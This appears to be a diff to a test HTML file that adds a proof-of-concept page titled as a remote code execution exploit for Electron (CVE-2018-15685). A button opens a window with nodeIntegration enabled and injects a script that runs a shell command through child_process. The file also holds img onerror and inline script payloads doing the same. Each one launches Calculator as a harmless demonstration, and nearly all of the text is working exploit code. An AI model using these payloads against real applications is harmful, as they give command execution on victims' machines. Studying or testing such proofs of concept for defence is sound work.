--- a/test_rc.html
+++ b/test_rc.html
@@ -1,3 +1,25 @@
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Electron CVE-2018-15685 RCE PoC</title>
+</head>
+<body>
+  <h1>Exploit Launcher</h1>
+  <button onclick="trigger()">Click to Exploit</button>
+
+  <script>
+    function trigger() {
+      const win = window.open('', '', 'nodeIntegration=yes');
+      win.document.write(`
+        <script>
+          require('child_process').exec('open -a Calculator');
+        <\/script>
+      `);
+    }
+  </script>
+</body>
+</html>
+
 <img src=x onerror="require('child_process').exec('open -a Calculator')">
 
 <script>require('child_process').exec('open -a Calculator')</script>
